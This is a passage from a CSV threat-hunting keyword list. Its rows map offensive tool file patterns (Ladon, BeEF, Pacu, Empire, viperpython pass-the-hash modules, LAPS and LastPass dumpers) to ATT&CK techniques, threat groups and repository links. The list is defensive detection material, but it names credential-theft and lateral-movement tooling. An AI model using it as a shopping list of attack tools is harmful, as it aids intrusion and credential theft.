loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*LadonGUI.exe*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*LadonLib.rar*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon-N20.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" +"*Ladon-N40.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - 
T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" +"*LadonStudy.exe*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Lalin.sh *","offensive_tool_keyword","LALIN","this script automatically install any package for pentest with uptodate tools . and lazy command for run the tools like lazynmap . 
install another and update to new","T1588","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/LALIN","1","0","N/A","N/A","4","350","164","2017-04-13T13:47:21Z","2016-06-10T07:53:49Z" +"*lambda__backdoor_new_sec_groups*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*lan_fingerprint_common.*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*lan_ping_sweep.json*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*lan_sw_port_scan.json*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*lanjelot*","offensive_tool_keyword","Github Username","github username. 
creator of patator and exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/lanjelot","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*LANs.py*","offensive_tool_keyword","LANs.py","Automatically find the most active WLAN users then spy on one of them and/or inject arbitrary HTML/JS into pages they visit","T1538.001 - T1539.003 - T1040 - T1057 - T1134 - T1218 - T1053 - T1055 - T1059.001 - T1059.003","TA0007 - TA0006 - TA0003 - TA0002 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/DanMcInerney/LANs.py","1","1","N/A","N/A","10","2533","518","2021-07-31T21:33:37Z","2013-01-03T19:33:52Z" +"*lanscan_arp.py*","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1842","1638","2023-08-12T21:49:36Z","2021-01-07T16:11:52Z" +"*lansearch.exe *","greyware_tool_keyword","advanced port scanner","port scanner tool abused by ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://www.advanced-port-scanner.com/","1","0","N/A","7","10","N/A","N/A","N/A","N/A" +"*lansearchpro_portable.zip*","greyware_tool_keyword","advanced port scanner","port scanner tool abused by ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://www.advanced-port-scanner.com/","1","1","N/A","7","10","N/A","N/A","N/A","N/A" +"*lansearchpro_setup.exe*","greyware_tool_keyword","advanced port scanner","port scanner tool abused by ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://www.advanced-port-scanner.com/","1","1","N/A","7","10","N/A","N/A","N/A","N/A" +"*laps_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability 
checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*LapsAllowedAdminGroups.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*LAPSDecrypt.*","offensive_tool_keyword","LAPSDecrypt","Quick POC looking at how encryption works for LAPS (v2)","T1552.004","TA0003","N/A","N/A","Credential Access","https://gist.github.com/xpn/23dc5b6c260a7571763ca8ca745c32f4","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Lapsdump.cna*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" +"*Lapsdump.exe*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" +"*LAPSDumper-main*","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential 
Access","https://github.com/n00py/LAPSDumper","1","1","N/A","10","3","222","34","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z" +"*LapsPasswords.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*LAPSToolkit*","offensive_tool_keyword","LAPSToolkit","Functions written in PowerShell that leverage PowerView to audit and attack Active Directory environments that have deployed Microsofts Local Administrator Password Solution (LAPS). It includes finding groups specifically delegated by sysadmins. finding users with All Extended Rights that can view passwords. and viewing all computers with LAPS enabled","T1087.001 - T1069 - T1069.003 - T1069.007 - T1069.002 - T1069.001","TA0007 - TA0008 - TA0009","N/A","N/A","Information Gathering","https://github.com/leoloobeek/LAPSToolkit","1","1","N/A","N/A","7","659","108","2018-01-31T14:45:35Z","2016-04-27T00:06:20Z" +"*LaresLLC/SlinkyCat*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","1","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*LasCC/Hack-Tools*","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5007","586","2023-10-03T15:40:37Z","2020-06-22T21:42:16Z" +"*lastpass.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 
- T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*lastpass/process_lp_files.py*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda 
- CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*lastpass_sniffed_fmt_plug*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*lastpass2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Lateral/DCom.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*Lateral/PSExec.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*Lateral/SMBClient.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*Lateral/SMBClientDelete.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*Lateral/SMBClientGet.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*Lateral/SMBClientPut.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*Lateral/WMIExec.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*lateral_wmi.py*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - 
TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" +"*LateralMovement_*_Exploit*.py","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*LateralMovement_ExploitationOfRemoteServices_AuxiliaryMs17010.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*LateralMovement_ExploitationOfRemoteServices_MS17010.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*LateralMovement_Other_Ladon.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*LateralMovement_PassTheHash_ByInvokeWMIExec.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*LateralMovement_PassTheHash_ByWmi.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" 
+"*LateralMovement_PassTheTicket_ByPsexec.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*LateralMovement_PassTheTicket_BySharpwmi.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*LateralMovement_PassTheTicket_ByWmi.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Launch Empire CLI*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and 
Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*Launch Empire Server*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - 
